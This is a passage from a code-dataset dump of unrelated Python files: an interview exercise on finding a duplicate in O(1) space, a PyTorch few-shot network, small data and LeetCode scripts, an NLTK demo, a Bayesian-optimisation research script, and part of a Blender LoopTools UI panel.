max(dict_journals.values())]\n    return(max_keys)","repo_name":"yelmaataoui/piepdata_poc","sub_path":"post_treatment_feature_utils.py","file_name":"post_treatment_feature_utils.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"7111126037","text":"\"\"\"\nFind a duplicate, Space Edition™. [see PDF]\n\nWe have a list of integers, where:\n1. The integers are in the range 1..n\n2. The list has a length of n+1\n\nIt follows that our list has at least one integer which appears at least twice. But it may have several duplicates, and each duplicate may appear more than twice.\n\nWrite a function which finds an integer that appears more than once in our list. (If there are multiple duplicates, you only need to find one of them.)\n\nWe're going to run this function on our new, super-hip MacBook Pro With Retina Display™. Thing is, the damn thing came with the RAM soldered right to the motherboard, so we can't upgrade our RAM.
So we need to optimize for space!\n\"\"\"\n\n# Editor Code\nimport unittest\n\n\ndef find_repeat(numbers):\n\n # Find a number that appears more than once\n\n\n return 0\n\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_just_the_repeated_number(self):\n actual = find_repeat([1, 1])\n expected = 1\n self.assertEqual(actual, expected)\n\n def test_short_list(self):\n actual = find_repeat([1, 2, 3, 2])\n expected = 2\n self.assertEqual(actual, expected)\n\n def test_medium_list(self):\n actual = find_repeat([1, 2, 5, 5, 5, 5])\n expected = 5\n self.assertEqual(actual, expected)\n\n def test_long_list(self):\n actual = find_repeat([4, 1, 4, 8, 3, 2, 7, 6, 5])\n expected = 4\n self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)\n\n\n# My attempted solution:\ndef duplicates(nums):\n seen = set()\n for num in nums:\n if num in seen:\n return num\n else:\n seen.add(num)\n\n\n\"\"\"\nGotchas:\nWe can do this in O(1) space.\n\nWe can do this in less than O(n^2) time while keeping O(1) space.\n\nWe can do this in O(n*logn) time and O(1) space.\n\nWe can do this without destroying the input.\n\nMost O(n*logn) algorithms double something or cut something in half. How can we rule out half of the numbers each time we iterate through the list?\n\n\"\"\"\n\n# Breakdown:\n# This one's a classic! We just do one walk through the list, using a set to keep track of which items we've seen!\n\ndef find_repeat(numbers):\n numbers_seen = set()\n for number in numbers:\n if number in numbers_seen:\n return number\n else:\n numbers_seen.add(number)\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\n# Bam. O(n) time and ... O(n) space ...\n# Right, we're supposed to optimize for space. O(n) is actually kinda high space-wise. Hm. We can probably get O(1)...\n\n\n# Solution:\n# We can \"brute force\" this by taking each number in the range 1..n and, for each, walking through the list to see if it appears twice.\n\ndef find_repeat_brute_force(numbers):\n for needle in range(1, len(numbers)):\n has_been_seen = False\n for number in numbers:\n if number == needle:\n if has_been_seen:\n return number\n else:\n has_been_seen = True\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\n# This is O(1) space and O(n^2) time.\n# That space complexity can't be beat, but the time cost seems a bit high. Can we do better?\n\n\"\"\"\nOne way to beat O(n^2) time is to get O(n*logn) time. Sorting takes O(nlgn) time. And if we sorted the list, any duplicates would be right next to each-other!\n\nBut if we start off by sorting our list we'll need to take O(n) space to store the sorted list...\n\n...unless we sort the input list in place!\n An in-place algorithm operates directly on its input and changes it, instead of creating and returning a new object. 
This is sometimes called destructive, since the original input is \"destroyed\" when it's edited to create the new output.\n\n    Careful: \"In-place\" does not mean \"without creating any additional variables!\" Rather, it means \"without creating a new copy of the input.\" In general, an in-place function will only create additional variables that are O(1) space.\n\n    Here are two functions that do the same operation, except one is in-place and the other is out-of-place:\n\n    def square_list_in_place(int_list):\n        for index, element in enumerate(int_list):\n            int_list[index] *= element\n\n        # NOTE: We could make this function just return, since\n        # we modify int_list in place.\n        return int_list\n\n\n    def square_list_out_of_place(int_list):\n        # We allocate a new list with the length of the input list\n        squared_list = [None] * len(int_list)\n\n        for index, element in enumerate(int_list):\n            squared_list[index] = element ** 2\n\n        return squared_list\n\n    Working in-place is a good way to save space. An in-place algorithm will generally have O(1) space cost.\n\n    But be careful: an in-place algorithm can cause side effects. Your input is \"destroyed\" or \"altered,\" which can affect code outside of your function. For example:\n\n    original_list = [2, 3, 4, 5]\n    squared_list = square_list_in_place(original_list)\n\n    print(\"squared: %s\" % squared_list)\n    # Prints: squared: [4, 9, 16, 25]\n\n    print(\"original list: %s\" % original_list)\n    # Prints: original list: [4, 9, 16, 25], confusingly!\n\n    # And if square_list_in_place() didn't return anything,\n    # which it could reasonably do, squared_list would be None!\n\n    Generally, out-of-place algorithms are considered safer because they avoid side effects. You should only use an in-place algorithm if you're very space constrained or you're positive you don't need the original input anymore, even for debugging.\n\nOkay, so this'll work:\n1. Do an in-place sort of the list (for example an in-place merge sort).\n2. Walk through the now-sorted list from left to right.\n3. Return as soon as we find two adjacent numbers which are the same.\nThis'll keep us at O(1) space and bring us down to O(nlgn) time.\n\nBut destroying the input is kind of a drag--it might cause problems elsewhere in our code. Can we maintain this time and space cost without destroying the input?\n\nLet's take a step back. How can we break this problem down into subproblems?\n\nIf we're going to do O(n*logn) time, we'll probably be iteratively doubling something or iteratively cutting something in half. That's how we usually get a \"logn\". So what if we could cut the problem in half somehow?\n\nWell, binary search [A binary search algorithm finds an item in a sorted list in O(log(n)) time.] works by cutting the problem in half after figuring out which half of our input list holds the answer.\n\nBut in a binary search, the reason we can confidently say which half has the answer is because the list is sorted. For this problem, when we cut our unsorted list in half we can't really make any strong statements about which elements are in the left half and which are in the right half.\n\nWhat if we could cut the problem in half a different way, other than cutting the list in half?\n\nWith this problem, we're looking for a needle (a repeated number) in a haystack (list). What if instead of cutting the haystack in half, we cut the set of possibilities for the needle in half?\n\nThe full range of possibilities for our needle is 1..n.
How could we test whether the actual needle is in the first half of that range (1..n/2) or the second half (n/2+1..n)?\n\nA quick note about how we're defining our ranges: when we take n/2 we're doing integer division, so we throw away the remainder. To see what's going on, we should look at what happens when n is even and when n is odd:\n- If n is 6 (an even number), we have ... so our ranges are 1..3 and 4..6\n- If n is 5 (an odd number), ... so our ranges are 1..2 and 3..5\n\nSo we can notice a few properties about our ranges:\n1. They aren't necessarily the same size.\n2. They don't overlap.\n3. Taken together, they represent the original input list's range of 1..n. In math terminology, we could say their union is 1..n.\n\nSo, how do we know if the needle is in the first half or the second half?\n\nThink about the original problem statement. We know that we have at least one repeat because there are n+1 items and they are all in the range 1..n, which contains only n distinct integers.\n\nThis notion of \"we have more items than we have possibilities, so we must have at least one repeat\" is pretty powerful. It's sometimes called the pigeonhole principle. [The pigeonhole principle states that if n items are put into m containers, with n > m, then at least one container must contain more than one item. For example, there must be at least two left gloves or two right gloves in a group of three gloves.] Can we exploit the pigeonhole principle to see which half of our range contains a repeat?\n\nImagine that we separated the input list into two sublists—one containing the items in the range of the first half and the other containing the items in the range of the second half.\n\nEach sublist has a number of elements as well as a number of possible distinct integers (that is, the length of the range of possible integers it holds).\n\nGiven what we know about the number of elements vs the number of possible distinct integers in the original input list, what can we say about the number of elements vs the number of distinct possible integers in these sublists?\n\"\"\"\n\n\"\"\"\nComplexity:\nO(1) space and O(n*logn) time.\n\nTricky as this solution is, we can actually do even better, getting our runtime down to O(n) while keeping our space cost at O(1). The solution is NUTS; it's probably outside the scope of what most interviewers would expect. But for the curious...(here it is)[link]!\n\n\nBonus:\nThis function always returns one duplicate, but there may be several duplicates.
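\nAn aside before the bonus -- a minimal sketch of the O(n*logn)-time, O(1)-space approach walked through above (our own illustration of the range-halving idea, not InterviewCake's official code; the function name is made up):\n\n    def find_repeat_binary_search(numbers):\n        floor, ceiling = 1, len(numbers) - 1\n        while floor < ceiling:\n            midpoint = floor + (ceiling - floor) // 2\n            # count how many items fall in the lower half of the current range\n            items_in_lower_range = sum(1 for item in numbers\n                                       if floor <= item <= midpoint)\n            distinct_possible_integers = midpoint - floor + 1\n            if items_in_lower_range > distinct_possible_integers:\n                # pigeonhole: a repeat must be in floor..midpoint\n                ceiling = midpoint\n            else:\n                # otherwise a repeat must be in midpoint+1..ceiling\n                floor = midpoint + 1\n        return floor\n\nBack to the bonus: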
Write a function that returns all duplicates.\n\"\"\"\n","repo_name":"zarkle/code_challenges","sub_path":"codility/interviewcake/Find_Duplicate_Space.py","file_name":"Find_Duplicate_Space.py","file_ext":"py","file_size_in_byte":9722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19056635937","text":"import torch\nimport torch.nn as nn\n\n\nclass Convnet(nn.Module):\n\n def __init__(self, x_dim=3, hid_dim=64, z_dim=64):\n super().__init__()\n self.encoder = nn.Sequential(\n conv_block(x_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, hid_dim),\n conv_block(hid_dim, z_dim),\n )\n self.out_channels = 1600\n\n def forward(self, x):\n x = self.encoder(x)\n return x.view(x.size(0), -1)\n\n\ndef conv_block(in_channels, out_channels):\n bn = nn.BatchNorm2d(out_channels)\n nn.init.uniform_(bn.weight)\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, padding=1),\n bn,\n nn.ReLU(),\n nn.MaxPool2d(2)\n )\n\n\ndef cosine_similarity(a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n cos = nn.CosineSimilarity(dim=2, eps=1e-6)\n return cos(a, b)\n\n\nclass ParametricDist(nn.Module):\n def __init__(self):\n super().__init__()\n self.dist = nn.Sequential(\n nn.Linear(1600, 64),\n nn.ReLU(),\n nn.Linear(64, 32),\n nn.ReLU(),\n nn.Linear(32, 1),\n nn.ReLU(),\n )\n\n def forward(self, a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n return self.dist(a-b).squeeze(-1)\n\n\ndef euclidean_metric(a, b):\n n = a.shape[0]\n m = b.shape[0]\n a = a.unsqueeze(1).expand(n, m, -1)\n b = b.unsqueeze(0).expand(n, m, -1)\n logits = -((a - b) ** 2).sum(dim=2)\n # since our goal is to minimize the loss\n # => place negative sign to distance\n # => the closer the distance, the smaller the loss\n return logits\n\n\nif __name__ == '__main__':\n # from torchsummary import summary\n #\n # net = Convnet()\n # net.to('cuda')\n # summary(net, (3, 84, 84))\n # r = torch.randn(1, 3, 84, 84, device=\"cuda\")\n # print(net(r).size())\n\n # v1 = torch.Tensor([[-0.7715, -0.6205, -0.2562]])\n # v2 = torch.Tensor([[-1.7715, -0.6205, -0.2562]])\n # v3 = torch.Tensor([[-2.7715, -0.6205, -0.2562]])\n #\n # print(cosine_similarity(v1, v2)) # 0.93\n # print(cosine_similarity(v1, v3)) # 0.8877\n # print(cosine_similarity(v2, v3))\n # print(cosine_similarity(v1, v1))\n\n # logits = torch.Tensor([[0.9, 0.05, 0.05]])\n # label = torch.Tensor([0]).long()\n # criterion = nn.CrossEntropyLoss()\n # loss = criterion(logits, label)\n # print(loss)\n\n v1 = torch.randn(1, 1600)\n v2 = torch.randn(10, 1600)\n\n dist = ParametricDist()\n output = dist(v1, v2)\n # print(output.size())\n # print(output[0])\n print(dist)\n # output2 = euclidean_metric(v1, v2)\n # print(output2.size())\n # print(output2[0])\n #\n # output3 = cosine_similarity(v1, v2)\n # print(output3.size())\n # print(output3[0])\n\n","repo_name":"m1stborn/DLCV2021","sub_path":"HW4/model_p1/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30305820425","text":"# get disaster names in string\ndisasterNames = uuidAnddisaster_name.values()\n\ndisasterNamesNotNone = []\ndisasterNameIsNoneUuid = []\n\nfor i,j in uuidAnddisaster_name.items():\n if len(j) > 0:\n disasterNamesNotNone.append(j)\n else:\n 
disasterNameIsNoneUuid.append(i)\n\ndisasterNamesString = []\nfor i in disasterNamesNotNone:\n    for j in i:\n        disasterNamesString.append(j)\n\n# get frequency of each disaster\ndisasterCnt = Counter(disasterNamesString)\ndisasterCntList = disasterCnt.items()\ndisasterCntSorted = sorted(disasterCntList,key=lambda tup: tup[1], reverse=True) # disasterCntSorted useful\n\n# each disaster and its related uuids\ndisasterAndUuid = {}\nfor i,j in uuidAnddisaster_name.items():\n    if len(j) > 0:\n        for k in j:\n            if k in disasterAndUuid:\n                disasterAndUuid[k].append(i)\n            else:\n                disasterAndUuid[k] = [i]\n\ndisasterAndUuidSorted = sorted(disasterAndUuid.items(), key=lambda x: len(x[1]), reverse=True)\n\ndisasterAndUuidSortedFinal = []\nfor i in disasterAndUuidSorted:\n    disasterAndUuidSortedFinal.append((i[0], sorted(i[1],key=uuidAndDateTime.get))) # disasterAndUuidSortedFinal useful\n\ndisasterAndUuidSortedFinalDict = {}\nfor i in disasterAndUuidSortedFinal:\n    disasterAndUuidSortedFinalDict[i[0]] = i[1]\n\nwith open('relatedDisasterDocs.json', 'w') as f:\n    json.dump(disasterAndUuidSortedFinalDict, f)","repo_name":"zhtpandog/LORELEI","sub_path":"KDD/GroundTruth.py","file_name":"GroundTruth.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"45570397672","text":"\n# Leetcode practice\n# author: orange\n# date: 2021/6/12\n\n# Easy problem\n\nclass Solution:\n    def nextGreatestLetter(self, letters, target: str):\n        for i in range(len(letters)):\n            if letters[i] > target:\n                return letters[i]\n        \n        return letters[0]\n\nexample = Solution()\nletters = [\"c\",\"f\",\"j\"]\ntarget = \"g\"\noutput = example.nextGreatestLetter(letters,target)\nprint(output)","repo_name":"orange-eng/Leetcode","sub_path":"easy/744_Find_Smallest_Letter.py","file_name":"744_Find_Smallest_Letter.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} {"seq_id":"25068468518","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport copy\nfrom collections import defaultdict\n\nfrom Components.ConditionalNormalDistribution import ConditionalNormalDistribution\nfrom Components.DifferentiablePolynomial import DifferentiablePolynomial\nfrom Models.ModelExponential import ModelExponential\nfrom Models.ModelSinCos import ModelSinCos\nfrom Plotting.HeatMapLossFunction import *\nfrom Composition.SequentialSystem import SequentialSystem\nfrom SearchAlgorithm.skeleton import BO_skeleton, BO_graph, BO_graph_local_loss\n\nfrom helper import *\n#\n# # f = ConditionalNormalDistribution()\n# f = DifferentiablePolynomial() # black box function (comes second)\n# f.noisy_operation = lambda y, n:(1+n)*y # set multiplicative noise\n# g_A = ModelExponential() # white box function (comes first)\n# g_A.noisy_operation = lambda y, n:y+n # set addition noise\n# g_B = ModelSinCos() # white box function (comes last)\n# g_B.noisy_operation = lambda y, n:y+n # set addition noise\n#\n# ground_truth_theta_0_A = 1.6\n# ground_truth_theta_1_A = 1.2\n#\n# ground_truth_theta_0_B = 0.9\n# ground_truth_theta_1_B = 1.4\n#\n# # generate local dataset over g (first component A)\n# X_local = torch.tensor(np.random.uniform(1, 3, size=100))\n# X_global = X_local\n# y_local = g_A(X_local, params=[ground_truth_theta_0_A, ground_truth_theta_1_A], noisy = True, noise_mean = 0.0) # labeling effort of local\n# # pass into black box component\n# X_b = f(y_local, noisy =
False) # ground truth, no noise in black box component\n# # generate local dataset over g2 (second component B)\n# system_output_no_perturbation = g_B(X_b, params=[ground_truth_theta_0_B, ground_truth_theta_1_B], noisy = True, noise_mean = 0.0) # labeling effort\n#\n# # generate end to end dataset (use same X)\n# X_global = X_local\n# z_global = system_output_no_perturbation\n#\n# # local gradient descent\n# all_theta_via_local = g_A.fit(X_local,y_local)\n# all_theta_via_local = g_B.fit(X_b,system_output_no_perturbation)\n#\n#\n# # create the system\n# s = SequentialSystem()\n#\n# s.addModel(g_A, X_local, y_local)\n# s.addComponent(f)\n# s.addModel(g_B, X_b, system_output_no_perturbation)\n# s.addGlobalData(X_global, z_global)\n#\n# # show parameters and local losses (components already have converged params from gradient descent)\n# print(s.get_parameters())\n# print(s.compute_local_loss())\n# print(s.compute_system_loss())\n#\n# # BO - parameters are resetted\n# all_theta_via_global, loss, param = BO_skeleton(s, objective=\"all\", model=\"single_task_gp\", printout=True)\n# print(\"local, system loss (best)\")\n# print(loss)\n# print(\"param\")\n# print(param)\n#\n# #plt, fig, ax = HeatMapLossFunction(X_local, y_local, X_global, z_global_pertubed, f, g, plt)\n#\n# #all_theta_via_global = s.fit_global_differentiable() # this performs end to end gradient descent\n# #\n# # all_theta_via_local = np.array(all_theta_via_local)\n# # all_theta_via_global = np.array(all_theta_via_global)\n# #\n# # ax[0].scatter(all_theta_via_local[:,0], all_theta_via_local[:,1], s=0.2,alpha=1, label=\"gradient climbing over local data set\")\n# # ax[0].scatter(all_theta_via_global[:,0], all_theta_via_global[:,1], s=1,alpha=1, label=\"end to end learning\")\n# # lgnd = ax[0].legend()\n# #\n# # ax[1].scatter(all_theta_via_local[:,0], all_theta_via_local[:,1], s=0.2,alpha=0.5)\n# # ax[1].scatter(all_theta_via_global[:,0], all_theta_via_global[:,1], s=1,alpha=0.5)\n# #\n# # plt.show()\n#\n#\n# # prediction_y = model(X_local.reshape(len(X_local),1))\n# # prediction_z_correct, prediction_z_pertubed = component.generate_both(prediction_y) # component is not perfect\n# #\n# # print(\"local loss: \", mean_squared_error(model(X_local.reshape(len(X_local),1)), y_local))\n# # print(\"system loss with erronous component: \", mean_squared_error(prediction_z_pertubed, z_local_ground_truth))\n# # print(\"system loss with correct component: \", mean_squared_error(prediction_z_correct, z_local_ground_truth))\n\n\nfrom GraphDecomposition.Heuristic import *\nfrom GraphDecomposition.DirectedFunctionalGraph import *\nfrom Components.DifferentiablePolynomial import *\nfrom Models.ModelSinCos import *\nfrom Models.ModelWeightedSum import *\nfrom Models.ModelExponential import *\n\nG = DirectedFunctionalGraph()\n#\n# G = nx.DiGraph()\n# G.add_node(0, idx=\"1\", component=ModelWeightedSum())\n# G.add_node(1, idx=\"1\", component=DifferentiablePolynomial())\n# G.add_node(2, idx=\"2\", component=ModelSinCos())\n# G.add_node(\"BlackboxB\", idx=\"3\", component=ModelWeightedSum())\n# G.add_node(8, idx=\"8\", component=DifferentiablePolynomial())\n# G.add_node(4, idx=\"4\", component=ModelSinCos())\n# G.add_node(5, idx=\"5\", component=ModelWeightedSum())\n# G.add_node(7, idx=\"7\", component=DifferentiablePolynomial())\n# G.add_node(\"exit\", idx=\"8\", component=ModelWeightedSum())\n# G.add_node(\"BlackboxA\", idx=\"6\", component=DifferentiablePolynomial())\n# G.add_node(6, idx=\"6\", component=ModelWeightedSum())\n#\n# G.add_edge(0, 2)\n# 
G.add_edge(1, 2)\n# G.add_edge(1, 5)\n# G.add_edge(2, \"BlackboxB\")\n# G.add_edge(\"BlackboxB\",8)\n# G.add_edge(8,7)\n# G.add_edge(5, \"BlackboxA\")\n# G.add_edge(\"BlackboxB\", 4)\n# G.add_edge(\"BlackboxA\", 4)\n# G.add_edge(4, 7)\n# G.add_edge(7, \"exit\")\n# G.add_edge(6, 5)\n#\n# all_black_box = [\"BlackboxA\", \"BlackboxB\"]\n# all_decomp = find_all_decomposition_full(all_black_box, G)\n# all_valid_decomp = get_all_valid_decomposition(all_decomp)\n# l = 1\n# best_decomposition, score = get_best_decomposition(all_valid_decomp, G, l=1)\n# print(\"\\n\", \"Best decomposition:\")\n# print(goodness_measure(G, best_decomposition, l))\n#\n# plot(G)\n# plt.show()\n\nground_truth_param = {1 : np.array([0.7, 1.1, -0.5]), 2: np.array([0.4, 0.5]),\n \"Blackbox3\":np.array([1.1, -0.5]), 4:np.array([1.1, -0.5]), \"Blackbox5\":np.array([0.7, -0.5]),\n \"Blackbox6\": np.array([0.7, 1.1]), 7: np.array([0.7, -0.5])}\ndef get_data(component : Model, input_range_lower, input_range_upper, ground_truth_param):\n # ground truth for training\n component = copy.deepcopy(component)\n component.set_params(ground_truth_param)\n\n X_local = torch.tensor(np.random.uniform(input_range_lower, input_range_upper, size=100))\n y_local = component.forward(X_local, noisy=True) # labeling effort of A\n\n return X_local, y_local\n\ndef get_data_tree(component : Model, input_range_lower, input_range_upper, ground_truth_param):\n # ground truth for training\n component = copy.deepcopy(component)\n component.set_params(ground_truth_param)\n\n X_local = torch.tensor(np.random.uniform(input_range_lower, input_range_upper, size=(2,100)))\n y_local = component.forward(X_local, noisy=True) # labeling effort of A\n\n return X_local, y_local\n\nDG = DirectedFunctionalGraph()\n\n# white box components\nDG.add_node(1, component=DifferentiablePolynomial())\nx,y = get_data(DG.nodes[1][\"component\"], 0, 5, np.array([0.7, 1.1, -0.5]))\nDG.nodes[1][\"component\"].attach_local_data(x,y)\n\nDG.add_node(2, component=ModelSinCos())\nx,y = get_data(DG.nodes[2][\"component\"], -3, 6, np.array([0.4, 0.5]))\nDG.nodes[2][\"component\"].attach_local_data(x,y)\n\nDG.add_node(4, component=ModelExponential())\nx,y = get_data(DG.nodes[4][\"component\"], 0, 5, np.array([1.1, -0.5]))\nDG.nodes[4][\"component\"].attach_local_data(x,y)\n\nDG.add_node(7, component=ModelSinCos())\nx,y = get_data(DG.nodes[7][\"component\"], 0, 5, np.array([0.7, -0.5]))\nDG.nodes[7][\"component\"].attach_local_data(x,y)\n\n# black box components\nDG.add_node(\"Blackbox3\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox3\"][\"component\"].set_params(ground_truth_param[\"Blackbox3\"])\n\nDG.add_node(\"Blackbox5\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox5\"][\"component\"].set_params(ground_truth_param[\"Blackbox5\"])\n\nDG.add_node(\"Blackbox6\", component=ModelWeightedSum())\nDG.nodes[\"Blackbox6\"][\"component\"].set_params(ground_truth_param[\"Blackbox6\"])\n\n# Test warning for multiple parents\nDG.add_edge((\"Blackbox6\",7),\"Blackbox3\")\nDG.add_edge((1,2),\"Blackbox3\")\n\nDG.add_edge((4,2),\"Blackbox5\")\n\n# Test warning for singular parents\nDG.add_edge(2,4)\nDG.add_edge(\"Blackbox3\",4)\nDG.add_edge((7,\"Blackbox5\"),\"Blackbox6\")\n\n# nx.draw_networkx(DG)\n# plt.show()\n\nX_end, y_end = get_end_to_end_data(DG, ground_truth_param)\nDG.system_x = X_end\nDG.system_y = y_end\n\n# grad descent\n# all_losses = show_system_loss_from_grad_descent(DG, ground_truth_param,plot=True)\n\n# vanilla BO\n# BO_graph(DG)\n\n# BO with local loss -> system 
loss\nbounds = torch.tensor([[0.75, 0.25,0.7,0.37],[100,0.75,30,0.5]])\nDG.fit_locally_partial()\nBO_graph_local_loss(DG, bounds)\n\n\n\n\n\n\n","repo_name":"chenzhiliang94/AutoAI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} {"seq_id":"40812976561","text":"# tokenizing: word_tokenizing, sentence_tokenizing\n# corpora: body of text\n# lexicon: words and their meanings\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\ntext = '''Hi, this is Prashant who loves doing code for Full-Stack Development. I've completed my graduation\n from Staffordshire University, my concentration was Software Engineering !!'''\nprint(word_tokenize(text))\nprint(sent_tokenize(text))\n","repo_name":"prashantkt10/sentdex-nlp","sub_path":"lec-1.py","file_name":"lec-1.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"30469832543","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# (C) 2017 MKB\n#\n# This program is free software; you can redistribute it and / or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110 - 1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n#\n\n\n# LOAD MODULE # \nimport bpy\nfrom bpy import *\nfrom bpy.props import *\nfrom ..
icons.icons import load_icons\n\nimport addon_utils\n\n\ndef draw_spacing_ui(self, context, layout):\n tp = context.window_manager.tp_props_looptools \n tp_props = context.window_manager.tp_props_resurface \n \n icons = load_icons()\n\n col = layout.column(align=True)\n \n if not tp_props.display_spacing: \n \n box = col.box().column(1)\n \n row = box.row(1) \n row.prop(tp_props, \"display_spacing\", text=\"\", icon=\"TRIA_RIGHT\", emboss = False) \n row.label(\"Spacing\")\n\n button_align_space = icons.get(\"icon_align_space\") \n row.operator(\"mesh.tp_looptools_space\", text=\"\", icon_value=button_align_space.icon_id) \n \n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"\", icon_value=button_align_distribute.icon_id) \n\n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"\", icon_value=button_align_straigten.icon_id) \n\n\n else:\n \n box = col.box().column(1)\n \n row = box.row(1) \n row.prop(tp_props, \"display_spacing\", text=\"\", icon=\"TRIA_DOWN\", emboss = False) \n row.label(\"Spacing\") \n\n button_align_space = icons.get(\"icon_align_space\") \n row.operator(\"mesh.tp_looptools_space\", text=\"\", icon_value=button_align_space.icon_id) \n \n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"\", icon_value=button_align_distribute.icon_id) \n\n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"\", icon_value=button_align_straigten.icon_id) \n\n\n\n box = col.box().column(1)\n \n row = box.column(1)\n row.operator(\"mesh.hd_viewport_vertex_align\")\n \n box.separator() \n \n row = box.column(1) \n button_align_straigten = icons.get(\"icon_align_straigten\") \n row.operator(\"mesh.vertex_align\",text=\"Straighten\", icon_value=button_align_straigten.icon_id) \n\n button_align_distribute = icons.get(\"icon_align_distribute\") \n row.operator(\"mesh.vertex_distribute\",text=\"Distribute\", icon_value=button_align_distribute.icon_id) \n\n imdjs_tools_addon = \"IMDJS_mesh_tools\" \n state = addon_utils.check(imdjs_tools_addon)\n if not state[0]:\n pass\n else: \n button_align_radians = icons.get(\"icon_align_radians\") \n row.operator(\"mesh.round_selected_points\", text=\"Radians\")\n\n box.separator() \n \n row = box.row(1) \n # space - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_space = icons.get(\"icon_align_space\") \n if tp.display_space:\n split.prop(tp, \"display_space\", text=\"\", icon_value=button_align_space.icon_id)\n else:\n split.prop(tp, \"display_space\", text=\"\", icon_value=button_align_space.icon_id)\n \n split.operator(\"mesh.tp_looptools_space\", text=\"LoopTools Space\", icon='BLANK1')\n\n # space - settings\n if tp.display_space:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"space_interpolation\")\n row.prop(tp, \"space_input\")\n\n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.space_lock_x:\n row.prop(tp, \"space_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.space_lock_y:\n row.prop(tp, \"space_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.space_lock_z:\n row.prop(tp, \"space_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"space_lock_z\", text = \"Z\", 
icon='UNLOCKED')\n col_move.prop(tp, \"space_influence\")\n\n box.separator() \n box = layout.box().column(1) \n\n\n row = box.row(1) \n # curve - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_curve = icons.get(\"icon_align_curve\") \n if tp.display_curve:\n split.prop(tp, \"display_curve\", text=\"\", icon_value=button_align_curve.icon_id)\n else:\n split.prop(tp, \"display_curve\", text=\"\", icon_value=button_align_curve.icon_id)\n\n split.operator(\"mesh.tp_looptools_curve\", text=\"LoopTools Curve\", icon='BLANK1')\n\n # curve - settings\n if tp.display_curve:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"curve_interpolation\")\n row.prop(tp, \"curve_restriction\")\n row.prop(tp, \"curve_boundaries\")\n row.prop(tp, \"curve_regular\")\n \n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.curve_lock_x:\n row.prop(tp, \"curve_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.curve_lock_y:\n row.prop(tp, \"curve_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.curve_lock_z:\n row.prop(tp, \"curve_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"curve_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"curve_influence\")\n\n box.separator() \n box = layout.box().column(1) \n\n\n row = box.row(1) \n # circle - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_circle = icons.get(\"icon_align_circle\") \n if tp.display_circle:\n split.prop(tp, \"display_circle\", text=\"\", icon_value=button_align_circle.icon_id)\n else:\n split.prop(tp, \"display_circle\", text=\"\", icon_value=button_align_circle.icon_id)\n\n split.operator(\"mesh.tp_looptools_circle\", text=\"LoopTools Circle\", icon='BLANK1')\n\n # circle - settings\n if tp.display_circle:\n box = col.box().column(1) \n \n row = box.column(1) \n row.prop(tp, \"circle_fit\")\n \n 